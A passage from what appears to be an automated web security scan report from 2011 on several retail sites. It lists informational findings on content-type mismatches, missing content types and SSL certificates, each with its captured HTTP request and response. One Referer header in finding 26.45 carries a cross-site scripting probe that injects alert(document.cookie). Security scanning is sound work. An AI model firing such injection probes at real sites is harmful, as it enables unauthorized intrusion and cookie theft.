Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:59:59 GMT
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 01:59:59 GMT
Content-Length: 2371

<h3 class="brand">Email Signup</h3>
<form action="/customer-service/footer-email-signup-thank-you.jsp" class="hasrequired" name="submitEmail" method="get" id="submitEmail"><input value="ISO-8859-1" ty
...[SNIP]...

26.44. http://www.siteadvisor.com/images/logo.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.siteadvisor.com
Path:   /images/logo.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/logo.gif HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
Cache-Control: max-age=0
If-Modified-Since: Tue, 29 Mar 2011 13:51:01 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "609d3e-984-49f9f59bcbb40"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_campaign=64895; s_nr=1305509542874-Repeat; s_sq=%5B%5BB%5D%5D; cid=64895

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:46 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 13:51:01 GMT
ETag: "51e03-984-49f9f59bcbb40"
Accept-Ranges: bytes
Content-Length: 2436
Content-Type: image/gif

.PNG
.
...IHDR................N....sRGB.........gAMA......a.....PLTE..0..=. J.0W.@d.Pq.`~.p..........................................................................................................
...[SNIP]...

26.45. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toshibadirect.com
Path:   /js/coremetrics/emptyfunctions.inc

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

26.46. http://www.toshibadirect.com/td/b2c/headerAjax.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toshibadirect.com
Path:   /td/b2c/headerAjax.jsp

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=ISO-8859-1. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /td/b2c/headerAjax.jsp?ts=1305510824386 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 01:53:56 GMT
Content-Length: 40
Content-Type: text/html;charset=ISO-8859-1


$0.00



26.47. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.toshibadirect.com
Path:   /js/coremetrics/emptyfunctions.inc

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

26.48. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.toshibadirect.com
Path:   /td/b2c/headerAjax.jsp

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=ISO-8859-1. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /td/b2c/headerAjax.jsp?ts=1305542709474 HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:18 GMT
Content-Length: 40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


$0.00



27. Content type is not specified
There are 5 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


27.1. https://secure.bluenile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.2.10.1305510928

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:02 GMT
Last-Modified: Wed, 11 May 2011 18:58:22 GMT
Accept-Ranges: bytes
ETag: W/"1406-1305140302000"
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=EA10D33975247F9BC51C69DD0D98B7B9; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ............................................................................................................................//..SS..kg.................................
...[SNIP]...

27.2. http://www.bluenile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:38 GMT
Last-Modified: Wed, 11 May 2011 17:19:04 GMT
Accept-Ranges: bytes
ETag: W/"1406-1305134344000"
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ............................................................................................................................//..SS..kg.................................
...[SNIP]...

27.3. http://www.helzberg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /

Request

GET / HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DMy%252520Account%252520-%252520Register/Sign%252520In%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.getElementById%252528%252527mainForm%252527%252529.action%25253D%252527/account/login.do%25253Fmethod%25253Dregister%2526oidt%253D2%2526ot%253DIMAGE; fsr.a=1305542740864

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:46:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:46:54 GMT
Content-Length: 925
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
       font-family : Arial, Helvetica, san
...[SNIP]...

27.4. https://www.helzberg.com/account/login.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/login.do

Request

POST /account/login.do?method=register HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: https://www.helzberg.com/account/login.do?method=view
Cache-Control: max-age=0
Origin: https://www.helzberg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DMy%252520Account%252520-%252520Register/Sign%252520In%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.getElementById%252528%252527mainForm%252527%252529.action%25253D%252527/account/login.do%25253Fmethod%25253Dregister%2526oidt%253D2%2526ot%253DIMAGE; fsr.a=1305542739864
Content-Length: 54

loginEmail=&loginPassword=&register.x=20&register.y=11

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:45:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:41 GMT
Content-Length: 925
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
       font-family : Arial, Helvetica, san
...[SNIP]...

27.5. https://www.helzberg.com/account/passwordrecovery.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/passwordrecovery.do

Request

GET /account/passwordrecovery.do?from=account HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305542733572

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:45:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:35 GMT
Content-Length: 925
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
       font-family : Arial, Helvetica, san
...[SNIP]...

28. SSL certificate
There are 18 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



28.1. https://ordering.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ordering.ftd.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 17 18:00:00 CST 2011
Valid to:  Wed Jan 18 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

28.2. https://secure.bhphotovideo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.bhphotovideo.com
Issued by:  Cybertrust SureServer Standard Validation CA
Valid from:  Wed Aug 25 21:07:25 CDT 2010
Valid to:  Thu Aug 25 21:07:25 CDT 2011

Certificate chain #1

Issued to:  Cybertrust SureServer Standard Validation CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 04 09:18:37 CDT 2007
Valid to:  Tue Apr 04 09:18:11 CDT 2017

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

28.3. https://secure.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.bluenile.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Jun 07 19:00:00 CDT 2009
Valid to:  Wed Jun 08 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

28.4. https://secure.homedepot.ca/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.homedepot.ca,ST=Ontario
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Jan 13 14:22:01 CST 2011
Valid to:  Fri Jan 13 14:22:01 CST 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

28.5. https://secure.orientaltrading.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.orientaltrading.com
Issued by:  COMODO Extended Validation Secure Server CA
Valid from:  Tue Jun 29 19:00:00 CDT 2010
Valid to:  Fri Jun 29 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO Extended Validation Secure Server CA
Issued by:  COMODO Certification Authority
Valid from:  Sun May 23 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO Certification Authority
Issued by:  AddTrust External CA Root
Valid from:  Wed Feb 10 18:00:00 CST 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

28.6. https://subscriptions.marvel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  subscriptions.marvel.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Oct 28 19:00:00 CDT 2009
Valid to:  Wed Dec 28 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

28.7. https://www.acehardware.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.acehardware.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun Apr 12 21:14:55 CDT 2009
Valid to:  Fri Jul 12 21:14:55 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

28.8. https://www.armaniexchange.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.armaniexchange.com,ST=New York
Issued by:  Akamai Subordinate CA 3
Valid from:  Wed Jul 14 15:31:08 CDT 2010
Valid to:  Thu Jul 14 15:31:08 CDT 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

28.9. https://www.brookstone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.brookstone.com
